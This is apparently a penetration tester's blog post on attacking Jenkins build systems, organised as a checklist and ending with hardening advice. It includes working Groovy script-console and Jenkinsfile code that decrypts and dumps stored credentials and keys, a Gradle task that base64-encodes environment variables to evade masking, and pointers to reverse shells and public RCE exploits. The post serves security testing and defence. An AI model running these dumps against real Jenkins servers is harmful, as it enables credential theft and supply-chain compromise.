During the last few yeas I pentested many build systems and their corresponding infrastructures with build schedulers. Most of them by far were build around Jenkins. I decided to write down my experience and share common security problems I encountered over the years. None of what I am about to write is new, most of it is scattered around many useful blogs or snippets on the Internet. The added value of this post is, you can take the table of contents as a check list. In case you encounter Jenkins for the first time during a pentest or any kind of sec engagement, you will get a good idea what to look for. If you are are a Jenkins admin reading this should give a good idea on what to secure and why.
The next section holds some truth about build systems in general, eventually I mention some mitigation suggestions. In case you are interested in the “Attacking Jenkins” part, jump right to Credentials section and read from that on.
Typical build jobs pull code from source code management systems (SCM) like Github or Gitlab to build it on a build scheduler like Jenkins. While it is best practice to build on separate build nodes, the access to other components in the infrastructure and the “build scheduling” itself is managed on the master node. When the build job is done, there might be some feedback to the issue tracking system or as a result of a successful build there might be a merge to the master branch, for example as an action to a successful pull request. Afterwards, the code is pushed to test environments. From there the binary artifacts are pushed to test landscapes and, at some point directly to production landscapes respectively the software store of your choice.
Looking at the infrastructure diagram above, the attackers’ goal might be just stealing source code, but the most valuable data is usually in production environments. The main threat is that backdoored software gets delivered to landscapes with customers’ systems or at least their data. To get there one could simply attack the systems of tenants. You might get one, and in case of cloud environments you might also be successful with the same approach for multiple landscapes. However, depending on the deployment scenario the attack might be complicated and cumbersome. So, why not just attack the build landscape, compromise the software there and let the software vendor take care of distribution to all tenants, right?
One can attack the SCM, the developers or binary repositories, e.g., for own or third-party libraries or to store own build artifacts. Targeting developers might be very hard or very easy, depending where you come from. Still, they might only have access to certain repos. Attacking the binary repositories or SCM is a better idea. The downside of the latter example is, somebody might notice changes in code/commits. Although this article focuses on the build scheduler, devs are still part of the threat model. If a user gets compromised, the attacker might commit malicious code. Developers have access to parts of the code, tests and the makefiles. This means they not just build, but execute code on your build systems. Therefore, it is best practice to execute builds on separate build nodes. Depending on how many developers you have (10 vs 1000), you should consider build nodes as compromised by design. In the default setup Jenkins builds all jobs with the same UID. This is why I am a huge fan of spinning up ephemeral nodes per build, e.g., a Kubernetes Pods, containers, EC2 Spot instances. This is not only about “the fired and disgruntled employee” scenario, but also about the likeliness of compromised client devices and phished employees.
There is also an arrow in the illustration above that we did not talk about yet. It is the “Build Job Management” between the build scheduler and the devs. This role should not be your build job administrator! Compromising one user can lead to partial compromise of code or some build nodes. Compromise of a Jenkins admin means they can take it all. In case your dev and admin team consists of a handful of people, which are responsible for all tasks, then it is not a relevant scenario for you. Otherwise, you are doing it wrong and you should ensure that devs only can access their build logs and maybe be able to trigger jobs (if it is not automatically taken care of by your SCM).
This means apply least privilege on source code, SCM (on organization and/or repo level) and especially on Jenkins level. The remaining threat model focuses on an attacker with network access to the build nodes and, the by far more interesting component the master node. This is what holds all credentials to the rest of the infrastructure. This post will focus on common mistakes made by administrators and how to exploit them. Besides that a common problem is credentials in public code repositories. It is not only about gitlab.com, github.com and others. Especially inside internal SCMs there are large amount of public repos and credentials to be found.
This is an important attack vector, I often see overlooked by pentesters - a gold mine for credentials.
It comes down to proper access controls and the implementation of least privilege principles. But it cannot help you when your patch management process is not existent. In case there are unpatched vulnerabilities, this leads to a similar outcome.
In the following sections I will discuss what to look for, when you find yourself attacking a Jenkins landscape, which common errors I found in the past and how to exploit them.
The credentials are stored inside the credentials.xml file in the $JENKINS_HOME directory (default is /var/lib/jenkins). The secret fields are always symmetrically encrypted. However, it is not meant as a protection. It is rather a best practice to avoid storing them in cleartext files or splitting them from the conventional backups. The key material also reside inside the $JENKINS_HOME. You can decrypt all credentials as soon as you have access to the following files.
master.key decrypts hudson.util.Secret which in return can decrypt secrets from the credentials.xml. You will find a load of decryption scripts on Github. What I have been using most of the times is thesubtlety’s ruby script. In early v2 and/or the Jenkins v1, the crypto routine was slightly different: use alternative hacky scripts. In most of the scripts you will have to adjust the XML parsing parts to catch all types of credentials.
It is possible to setup Jenkins build agents from the master node and I found it to be a popular pattern. On Windows it works via WMI and on GNU/Linux via SSH. In both cases you will find the creds in the credentials.xml, or sometimes in ~/.ssh/ folder. Since credential management is cumbersome the common pattern is to use one account for the whole infrastructure. In any case, you will find them on the master node.
Jenkins creates an API token for every user to be used for automation scenarios utilizing the CLI or the REST API. Beside the bcrypt password hashes of the respective user the file $JENKINS_HOME/users/$USERNAME/config.xml also stores their API token. It is also symmetrically encrypted in the same manner. As soon you have local access to the master’s file system, you would rather go for the global credentials directly. This scenario makes more sense if you found the API token somewhere in public code repos or some other source. People tend to commit their tokens in automation scripts wrapped around curl and underestimate their power. The impact heavily depends on the permissions of the user.
The API tokens are used for Basic Authentication. However, Jenkins does not return a 401 HTTP status so your browser will not prompt an authentication pop-up, like you are used to. Instead, you will have to pass the corresponding header explicitly! My weapon of choice here is appending the header to every request in Burp Suite (base64 encode $username:$apitoken). Reloading the site, you should be logged in as the corresponding user. In case that worked, you should jump to section Lax User Permissions.
Note, since v2.129 the token generation must be triggered by the user in their profile config. Furthermore, they are not just encrypted anymore, they are also hashed. In case the Jenkins was upgraded from a previous version, admins have to migrate them though. I never found the config.xml files without the credentials.xml laying around but it is useful to know in case you stumble upon backups or wonder why your setup is not working.
Build outputs are a gold mine. Jenkins masks known credentials with * chars, to prevent accidental disclosure. Usually, a lot of custom scripts run with “set -x” debugging options in Bash scripts and, I often see users store their credentials in their own build scripts or environment variables. Worst case, you will end up learning relevant things for reconnaissance. If you happen to run into large Jenkins instances, it helped me to scrape all build job names, add them into a wordlist, and then throw them into Burp’s Intruder: $JENKINS_HOST/job/$JOBNAME/1/consoleText. Afterwards, grep for password fields in the HTTP responses.
You can lookup $JENKINS_HOST/env-vars.html to see which variables are available globally. Finding this in respective build jobs might help you for further recon, but will not bring you far. I often found environment variables in the build output either not removed after debugging or accidentally disclosed in scripts. The EnvInject plugin is not installed by default but in case it is, the button “Environment Variables” discloses all environment variables of a particular build (you have to go to the specific build, not just the build project).
I often find the access management to be very lax. The “Security” plugin, which is installed per default, lets one control the permissions in different ways. It is, ironically, possible to deactivate the “Security” check mark and every visitor is admin automatically. I found this a couple of times, but more often one sees that the admins simply do not realize which permissions are critical. As soon as the user base gets bigger, I encountered the Matrix-based permission model to be used.
In nearly every case I see that anonymous or logged-in users are able trigger arbitrary builds and can see their output. This is less dangerous as opposed to editing permissions (how to exploit these permissions is described later in this section). Still, it can be useful to dig in the jobs’ build outputs, and adjusting the build parameters can get you far, too. The ability to create and configure builds is usually as useful to the attacker as the admin permissions.
I also find it very common that further plugins for grouping jobs are used. This enables the administrators to arrange permissions per group.
At the same time access management gets even more complicated. Obviously, the attackers’ jackpot is to find themselves as a privileged anonymous or logged-in user. However, it is also of the essence to have a way in with credentials from other sources like public repos.
As soon as you are in the UI you should check whether you see the “Manage Jenkins” button in the navigation bar. If yes, either the admin unchecked “Enable security”, they misconfigured the authorization matrix or, you dug up the credentials from somewhere else. Anyway, you are admin and the first thing you should do, is go to the $JENKINS_HOST/script URL. This is a Groovy/Java console which executes code in the context of the affected Jenkins instance. Metasploit has a module to exploit this. I find it easier dumping the credentials by hand with couple lines of code.
// Execute any commands in local context.
'id'.execute().text
// Identify the $JENKINS\_HOME. If getAbsolutePath()
// does not work out, try investigating 'ps faux'.
absolute_path = new File('.').getAbsolutePath()
println(new File(absolute_path + '/credentials.xml').text)
// Use onboard-API to decrypt the encrypted
// fields from the credentials.xml.
passwd = hudson.util.Secret.decrypt('{AQAAABAAAAAQbwWbc2MXnv8mte1/Ij6VysBTbBBA/QowALdl72x52ng=}')
// Get a reverse shell with execute() or
// dump the relevant files directly.
println(new File('/var/lib/jenkins/secrets/hudson.util.Secret').text.bytes.encodeBase64().toString())
There are also ways to talk to the script console via curl or, if you should have a use case for that, to open the script console on build nodes via “Manage jenkins” -> “Manage Nodes”. See the Jenkins docs for more details.
The ability to create or edit build jobs gives code exec, depending on the config even on the master node. In case you do not have admin permissions but you see “New Item” in the navigation bar, simply create one to run your code - it is pretty much the intended functionality. The most straight forward way is to create a “Freestyle project”. Like depicted in the following illustration, scroll down to the “Build” section and create an “Execute Shell” build step. There you can probe around the file system, or get a (reverse) shell directly. Since the build jobs often kill the shell right after execution, a sleep helps the build job to remain in execution state.
In case you do not see the “New Item” button, click on the build jobs and look for the “Configure” button in the navigation bar. I found it to be a common mistake for reasons described in Lax User Permissions. Therefore, it is worth to spend time and investigate all or at least most jobs you see on the Jenkins. I believe Nikhil was the first one to document this publicly.
As a side note, in case you find your self in a busy build environment and/or the executors on the build nodes are limited (admin can configure how many build jobs can run simultaneously), jamming the build queues is a common reason to be detected. Do your task and get out of there.
I also encounter central build services in corporations, which develop libraries for the Jenkinsfile (read the Jenkins docs for details), templates and other predefined functionality to cover common build and deployment scenarios. Like in all code, you should look for vulnerabilities. How you can exploit them depends on what kind of permissions you have and the template/library you are attacking of course. If you can build jobs command injections are your best friends. Having influence to hostnames which are “curl-ed” can be very powerful, in case there are credentials attached to the HTTP header.
A common permission setting I encounter is that anonymous or logged in users cannot edit anything, but are able to trigger the build jobs. This is often tied to custom parameters. Look for “Build with Parameters” button inside the jobs. This is an underestimated attack surface.
Build schedulers usually execute code which is out of control of the administrator by design. The threat model here is that developers with write-access to code can execute anything they want on the build nodes and thereby have access to credentials used in the particular build job. The following snippet is just a simple Gradle task that dumps all environment variables. The base64 encoding is needed since Jenkins masks known credentials in the build output.
defaultTasks 'run'
task run {
doLast {
System.getenv().each { k, v -> println "KEY: ${k}, VALUE: ${v}".bytes.encodeBase64().toString() }
}
}
If building on the master node is not turned off, one can simply cat the credentials.xml and the corresponding keys into the build job output.
Jenkins does not only provide you an easy to use UI, but lets you define your whole build pipeline in code. The Jenkinsfile is very powerful and gives the ability to do everything you can do in the UI with a Groovy-based DSL. I will focus on the credential handling here, but you should read the Jenkins docs in case you encounter this scenario.
stage('Creds Dump') {
steps {
withCredentials([string(credentialsId: 'MYCREDS', variable: 'AUTHTOKEN')]) {
sh '''
curl -H 'auth:$AUTHTOKEN' https://someservice/
'''
}
}
}
The code snippet above accesses the secret MYCREDS from the Jenkins credential storage and makes it usable within the “withCredentials” block as the environment variable $AUTHTOKEN. In case you can influence the Jenkinsfile you can dump the credentials into the build output by using echo (or exfiltrate them by other means). However, you must know the credentials id or at least the description text defined in Jenkins’ credential storage. An easier way is just to iterate through the key-value variable that holds all credentials. Andrzej Rehmann wrote a detailed blogpost on dumping credentials from within the Jenkinsfile. The following snippet lets you do that and is solely based on his work. Do not forget the base64 encoding to prevent known passwords to be masked in the build output.
ef creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class,
Jenkins.instance,
null,
null
);
for (c in creds) {
println( ( c.properties.privateKeySource ? "ID: " + c.id + ", UserName: " + c.username + ", Private Key: " + c.getPrivateKey() : "").bytes.encodeBase64().toString())
}
for (c in creds) {
println( ( c.properties.password ? "ID: " + c.id + ", UserName: " + c.username + ", Password: " + c.password : "").bytes.encodeBase64().toString())
}
If you can build code you can execute code. If the administrators done everything right you can only execute it on build nodes. In this situation the Swarm plugin can aid the attackers to compromise the master node. The plugin enables build nodes to join the master instead the other way around. This can make deployment of new nodes more seamless, however they have to setup themselves on the Jenkins master. To do that the Swarm client needs an API token for a privileged service user. The credentials are passed via command line.
-password VAL : The Jenkins user password
-passwordEnvVariable VAL : Environment variable that the
password is stored in
-passwordFile VAL : File containing the Jenkins user
The API token can be trivially found with ps faux | grep swarm-client.jar
.
Please note, I do not have a grudge against the plugin authors. Like the EnvInject plugin, I mention it here because I found it to be popular and depending on your threat model its usage can have a severe impact.
Running unpatched services seems like a typical case of negligence. Although I stay by my statement I need to explain the reason why I have seen more outdated Jenkins instance than any other software.
Jenkins is incredibly fragile and I only saw few landscapes handle it well. The native and third party plugins basically give you a feature monster. You can cover every use case and that is the reason for its popularity. But plugins break. After updates they break regularly and this happens to most Jenkins admins I spoke to. The ones that developed own custom plugins were looking for ways to drop it. The only effective patch management I saw was tied to high operational overhead and, in case the unit’s environment allowed them to, forcing changes of pipeline code onto developers or admins. The latter is rare - nobody likes change.
The extended attack surface has obvious downsides. Look through the change logs and you will quickly understand what I mean. Imho, the Jenkins team has a great process on handling vulnerabilities. There is an announcement mailing list, the change log is well documented, there are unit tests for the vulnerabilities and code documents them as well. This makes it possible to find the fixes, or at least the particular tests.
As for particular vulnerabilities that bring you further during a security engagement:
For the metaprogramming bug I will go a little bit more into detail for the rest of this section. It has something to do URL routing of the underlying web framework. When calling the URL $JENKINSHOST/adjuncts/whatever/class/classLoader/resource/index.jsp/content the following code is called.
jenkins.model.Jenkins.getAdjuncts("whatever")
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
Orange Tsai found code gadgets that can be reused to download external code and then execute it, by just manipulating the URL. It gives you reliable code execution without any authentication. There are multiple exploits out there and some of them use slightly different bugs. The corresponding Metasploit module looks promising. I have been using the python exploit by wetw0rk and 0xtavian multiple times. All that is needed is a valid username, which is considered public information. With Read/Overall permissions it can be retrieved through the “People” button in the Jenkins web UI. To fully understand the exploit read the original blogpost by Orange, part1 and part2. The recording from his HITB talk recording is of great value, too.
All the discussed vulns are pretty old. Like I mentioned in the beginning of this section, Jenkins is really hard to keep up-to-date. So I still find them to be relevant.
In case you are an admin your first order of business should be reading through the Jenkins handbook on Managing Security and Security Jenkins. It handles a lot of configurations I mentioned before and goes far beyond that. I still want to point out some topics close to my heart.
Do proper threat modelling: include the developers into the big picture and treat build nodes as a hostile environment. Consider what developers can see and access by design (remember the Jenkinsfile section). Be aware of the risk.
Credential management concept: automation scenarios need to handle tons of secrets - unfortunately centrally. When they get out, you are doomed. Prepare for failure: minimize the impact. Apply least privilege principle to all service accounts. Why the hell does your AWS service account needs IAM permissions to create other admin users for your landscape?
Do not build on the master: to my knowledge one can only turn off the master node for builds by using additional plugins. Alternatively, you can still set the number of executors for the master node to zero. In case somebody tries to build there, you will see it queued on the master forever (until deleted).
Set permissions properly: think about setting which info developers can access. Decide who administers the Jenkins and who should have access to the credentials. Do your permission settings reflect that? For many past vulnerabilities the Read/Overall permission is has been a requirement. Avoid exposing any information to anonymous users at all.
Patch! Patch, like you never patched before! I understand why so many people use Jenkins: I do not know any free or commercial product that has that many features. In that sense it is a great tool. But you will require a lot of operations stamina. Decide early on whether you have it or evaluate slimmer alternatives that are specific to your use case and/or workflow.
Props and thanks to @carloz_spicy for review.